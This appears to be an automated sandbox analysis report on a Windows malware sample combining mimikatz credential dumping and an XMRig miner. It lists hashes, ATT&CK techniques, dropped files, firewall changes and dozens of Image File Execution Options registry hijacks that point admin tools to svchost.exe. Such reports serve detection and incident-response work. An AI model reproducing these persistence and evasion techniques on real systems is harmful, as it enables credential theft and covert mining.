mimikatz | 8a2adb9053da9762f58acc6dcc026e74508f177c6c2af0a197365d95a2bcd492

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-12-2024 23:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
Size

9.3MB
MD5

d8bee6085865b2280551d3db5138aca0
SHA1

22713207e172f6d9a9375a232f227a4374446d35
SHA256

8a2adb9053da9762f58acc6dcc026e74508f177c6c2af0a197365d95a2bcd492
SHA512

f832d3b473235eda43c19610be88772e6013d955d52c05dc242a7ffd5e1a37c988731dac78a8f54cabe7d591f04c1f11e61136cce81903bf5d148d51c3465526
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1608 created 2132	1608	zyejeil.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (31047) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/524-178-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-182-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-204-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-216-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-225-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-236-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-249-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-498-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-500-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-502-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-757-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig
behavioral2/memory/524-758-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/1172-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1172-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0008000000023c85-7.dat	mimikatz
behavioral2/memory/3656-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4280-138-0x00007FF743F30000-0x00007FF74401E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	zyejeil.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	zyejeil.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	zyejeil.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zyejeil.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1764	netsh.exe
4348	netsh.exe

Executes dropped EXE 29 IoCs

pid	Process
3656	zyejeil.exe
1608	zyejeil.exe
2620	wpcap.exe
5112	zqkkhilub.exe
4280	vfshost.exe
2908	xohudmc.exe
4208	cusoqc.exe
3252	ucqzmelym.exe
524	ejzklm.exe
2024	ucqzmelym.exe
4868	ucqzmelym.exe
452	ucqzmelym.exe
1984	ucqzmelym.exe
3000	zyejeil.exe
4488	ucqzmelym.exe
1820	ucqzmelym.exe
2480	ucqzmelym.exe
4340	ucqzmelym.exe
4708	ucqzmelym.exe
4468	ucqzmelym.exe
1048	ucqzmelym.exe
4400	ucqzmelym.exe
2152	ucqzmelym.exe
4024	ucqzmelym.exe
1916	ucqzmelym.exe
1568	ucqzmelym.exe
5000	ucqzmelym.exe
1628	nusubcedp.exe
2372	zyejeil.exe

Loads dropped DLL 12 IoCs

pid	Process
2620	wpcap.exe
2620	wpcap.exe
2620	wpcap.exe
2620	wpcap.exe
2620	wpcap.exe
2620	wpcap.exe
2620	wpcap.exe
2620	wpcap.exe
2620	wpcap.exe
5112	zqkkhilub.exe
5112	zqkkhilub.exe
5112	zqkkhilub.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
65	ifconfig.me
64	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\cusoqc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	zyejeil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	zyejeil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	zyejeil.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	zyejeil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	zyejeil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F	zyejeil.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\cusoqc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	zyejeil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F	zyejeil.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	zyejeil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	zyejeil.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	zyejeil.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cdc-135.dat	upx
behavioral2/memory/4280-136-0x00007FF743F30000-0x00007FF74401E000-memory.dmp	upx
behavioral2/memory/4280-138-0x00007FF743F30000-0x00007FF74401E000-memory.dmp	upx
behavioral2/files/0x0007000000023ce4-155.dat	upx
behavioral2/memory/3252-156-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/3252-160-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/files/0x0007000000023ce6-164.dat	upx
behavioral2/memory/524-165-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/2024-171-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/4868-175-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/524-178-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/452-180-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/524-182-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/1984-185-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/4488-193-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/1820-197-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/2480-201-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/524-204-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/4340-206-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/4708-210-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/4468-214-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/524-216-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/1048-219-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/4400-223-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/524-225-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/2152-228-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/4024-231-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/1916-233-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/1568-235-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/524-236-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/5000-238-0x00007FF673550000-0x00007FF6735AB000-memory.dmp	upx
behavioral2/memory/524-249-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/524-498-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/524-500-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/524-502-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/524-757-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx
behavioral2/memory/524-758-0x00007FF7E4F50000-0x00007FF7E5070000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\libxml2.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\vimpcsvc.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.xml	zyejeil.exe
File created	C:\Windows\uzepkltb\spoolsrv.xml	zyejeil.exe
File opened for modification	C:\Windows\uzepkltb\schoedcl.xml	zyejeil.exe
File opened for modification	C:\Windows\lrcwzntnt\Corporate\log.txt	cmd.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\coli-0.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\xdvl-0.dll	zyejeil.exe
File created	C:\Windows\uzepkltb\docmicfg.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\cnli-1.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\Corporate\mimilib.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\bmkbibntg\scan.bat	zyejeil.exe
File created	C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\exma-1.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\spoolsrv.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.xml	zyejeil.exe
File created	C:\Windows\ime\zyejeil.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\libeay32.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\ssleay32.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\trch-1.dll	zyejeil.exe
File created	C:\Windows\uzepkltb\svschost.xml	zyejeil.exe
File created	C:\Windows\uzepkltb\vimpcsvc.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\AppCapture32.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\posh-0.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\tibe-2.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\docmicfg.xml	zyejeil.exe
File opened for modification	C:\Windows\uzepkltb\svschost.xml	zyejeil.exe
File opened for modification	C:\Windows\uzepkltb\docmicfg.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\Shellcode.ini	zyejeil.exe
File opened for modification	C:\Windows\uzepkltb\zyejeil.exe	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
File created	C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\zlib1.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\svschost.xml	zyejeil.exe
File opened for modification	C:\Windows\uzepkltb\vimpcsvc.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\Corporate\mimidrv.sys	zyejeil.exe
File created	C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\Corporate\vfshost.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.xml	zyejeil.exe
File created	C:\Windows\uzepkltb\schoedcl.xml	zyejeil.exe
File opened for modification	C:\Windows\uzepkltb\spoolsrv.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\upbdrjv\swrpwe.exe	zyejeil.exe
File created	C:\Windows\uzepkltb\zyejeil.exe	2024-12-31_d8bee6085865b2280551d3db5138aca0_hacktools_icedid_mimikatz.exe
File created	C:\Windows\lrcwzntnt\bmkbibntg\wpcap.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\schoedcl.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\crli-0.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\ucl.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.exe	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\trfo-2.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.xml	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\AppCapture64.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\bmkbibntg\ip.txt	zyejeil.exe
File opened for modification	C:\Windows\lrcwzntnt\bmkbibntg\Result.txt	nusubcedp.exe
File opened for modification	C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll	zyejeil.exe
File created	C:\Windows\lrcwzntnt\UnattendGC\specials\tucl-1.dll	zyejeil.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4136	sc.exe
3872	sc.exe
5072	sc.exe
2760	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

